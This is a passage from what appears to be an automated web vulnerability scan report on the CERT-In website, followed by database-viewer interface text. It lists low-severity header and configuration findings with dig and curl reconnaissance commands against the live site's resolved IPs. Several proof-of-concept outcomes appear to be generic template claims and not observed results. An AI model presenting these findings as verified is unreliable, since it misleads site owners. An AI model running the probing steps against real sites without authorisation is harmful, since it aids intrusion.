cumulative data points enhance adversary situational awareness and targeting precision.\n\n---\n\n#### Content Security Policy Configuration / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe `default-src` CSP directive is entirely absent from the main page’s HTTP headers. As a foundational policy component, its absence leaves numerous content categories unprotected, reducing overall XSS mitigation efficacy.\n\n**Attack Scenario (Proof of Concept)**\nNo `default-src` defined:\n```\nContent-Security-Policy: script-src 'self'; img-src *\n```\nAllows images from any source and defaults remaining directives to unrestricted behavior.\n\n**Business Impact**\nPartial CSP implementation offers limited protection and creates false confidence in security posture, especially concerning modern web threats reliant on multi-vector payloads.\n\n---\n\n### Informational Findings\n\n#### Multiple IPs Found / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe asset resolves to multiple IP addresses: 103.218.109.197, 14.139.54.229, and 59.176.167.109. This indicates that the domain is likely hosted behind a load balancer or distributed infrastructure. While not inherently a vulnerability, identifying multiple endpoints can provide attackers with additional reconnaissance vectors, including potential bypasses if some servers are misconfigured differently than others.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to resolve all A records associated with the domain:\n```bash\n$ dig A www.cert-in.org.in +short\n103.218.109.197\n14.139.54.229\n59.176.167.109\n```\nSubsequently, they may probe each endpoint directly via HTTP(S) to identify version inconsistencies, exposed administrative interfaces, or differing security configurations across backend hosts.\n\n**Business Impact**\nWhile this finding does not pose direct risk, it increases the attack surface by exposing more network endpoints. If any of these IPs host outdated or misconfigured services, it could lead to unauthorized access or service compromise.\n\n---\n\n#### Re-examine Cache-control Directives / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nMissing or improperly configured cache-control headers allow intermediaries (browsers/proxies) to store sensitive content locally. Without explicit directives like `no-store` or `private`, confidential data may persist beyond intended scope.\n\n**Attack Scenario (Proof of Concept)**\nSensitive API response lacks cache headers:\n```\nHTTP/1.1 200 OK\nContent-Type: application/json\n```\nBrowser caches response, enabling retrieval after logout via back-button navigation or history inspection.\n\n**Business Impact**\nPotential privacy violations and unauthorized access to authenticated sessions or personal data stored in local caches.\n\n---\n\n#### Re-examine Cache-control Directives / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nAbsence of cache-control headers on public files like `robots.txt` may cause outdated versions to linger in proxy caches, misleading crawlers about current disallowances or sitemaps.\n\n**Attack Scenario (Proof of Concept)**\nOlder version of `robots.txt` remains cached despite recent changes:\n```\nDisallow: /admin/\n```\nSearch engines continue respecting old rules until TTL expires, delaying discovery of newly exposed paths.\n\n**Business Impact**\nStale caching affects crawl efficiency and delays indexing improvements, impacting discoverability and potentially exposing deprecated sections prematurely.\n\n---\n\n#### Re-examine Cache-control Directives / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLack of cache-control directives on `sitemap.xml` leads to inconsistent propagation across distributed networks. Outdated sitemaps may remain active longer than necessary, causing incorrect indexing behaviors.\n\n**Attack Scenario (Proof of Concept)**\nNewly removed pages still listed in cached sitemap:\n```xml\n<url><loc>/deprecated-page.html</loc></url>\n```\nSearch bots revisit non-existent URLs repeatedly, generating unnecessary error traffic.\n\n**Business Impact**\nDegraded SEO performance and increased server load due to redundant requests stemming from stale sitemap caches.\n\n---\n\n#### User Agent Fuzzer / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nDifferences in server responses based on varying User-Agent strings suggest adaptive logic or device-specific routing. While useful for responsive design, inconsistent behavior may hint at hidden functionality or debug interfaces.\n\n**Attack Scenario (Proof of Concept)**\nSending modified UA string triggers alternate response:\n```bash\ncurl -H \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)\" https://www.cert-in.org.in/\n```\nServer returns different HTML layout or exposes admin panel elements.\n\n**Business Impact**\nUnintended feature toggling or debugging features exposed to public can facilitate further probing or privilege escalation attempts.\n\n---\n\n#### User Agent Fuzzer / cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in |\n\n**Description**\nBehavioral variance upon altering User-Agent headers suggests conditional rendering or routing logic. This pattern often correlates with mobile/desktop switching or bot detection mechanisms.\n\n**Attack Scenario (Proof of Concept)**\nSwitching between desktop and mobile UAs yields distinct responses:\n```bash\ncurl -H \"User-Agent: iPhone Safari\" https://www.cert-in.org.in/\ncurl -H \"User-Agent: Chrome Desktop\" https://www.cert-in.org.in/\n```\nComparing hashes reveals divergent output templates.\n\n**Business Impact**\nInconsistent delivery models complicate testing coverage and increase likelihood of undetected vulnerabilities specific to certain clients.\n\n---\n\n#### User Agent Fuzzer / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nAltering User-Agent strings while accessing `sitemap.xml` produces varied outputs, suggesting dynamic generation tailored to requester type. Such variability may introduce inconsistencies in search engine indexing workflows.\n\n**Attack Scenario (Proof of Concept)**\nDifferent sitemaps returned depending on UA:\n```bash\ncurl -H \"User-Agent: Bingbot\" https://www.cert-in.org.in/sitemap.xml\ncurl -H \"User-Agent: Firefox\" https://www.cert-in.org.in/sitemap.xml\n```\nEach call returns unique `<urlset>` contents.\n\n**Business Impact**\nFragmented sitemap delivery hampers unified crawling strategies and introduces ambiguity in content governance.\n\n---\n\n#### User Agent Fuzzer / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nResponses differ when querying `robots.txt` with various User-Agents, implying rule customization per crawler identity. Misconfigurations here can result in unintended exclusions or exposures.\n\n**Attack Scenario (Proof of Concept)**\nCustomized rules served to specific bots:\n```txt\nUser-agent: Googlebot\nDisallow: /private/\n\nUser-agent: *\nAllow: /\n```\nManual override bypasses general restrictions.\n\n**Business Impact**\nMisaligned robot directives affect crawl permissions and expose unintended directories to automated scanners.\n\n---\n\n#### User Agent Fuzzer / Images Directory\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/Images |\n\n**Description**\nAccessing the `/Images` directory with altered User-Agent strings results in differing directory listings or file availability. This inconsistency may point to environment-specific deployments or legacy configurations.\n\n**Attack Scenario (Proof of Concept)**\nDirectory listing enabled only for mobile UAs:\n```bash\ncurl -H \"User-Agent: Android Browser\" https://www.cert-in.org.in/Images/\n```\nReturns full index instead of forbidden status.\n\n**Business Impact**\nExposure of directory contents increases risk of discovering backup files, temporary uploads, or development artifacts.",
  "summary": {
    "total": 23
  }
}
 
{
  "total": 23
}
6a1f302ecdcdcbd0a53116bf
Tue Jun 02 2026 19:34:06 GMT+0000 (Coordinated Universal Time)
https://onmark.co.in/nmu/
generate_web_vulnerability_report
*** LARGE PROPERTY ***
~114 KB
Preview:{"url":"https://onmark.co
Click to fetch this property
 
{
  "total": 59
}

Rename Collection

webdb .

Tools


Export Standard

Export --jsonArray

Export --csv

Reindex

Import --mongoexport json

Compact

Collection Stats

Documents 9
Total doc size 131.1 KB
Average doc size 14.57 KB
Pre-allocated size 136 KB
Indexes 1
Total index size 36 KB
Padding factor
Extents

Indexes

Name Columns Size Attributes Actions
_id_
_id   ASC
36 KB
 DEL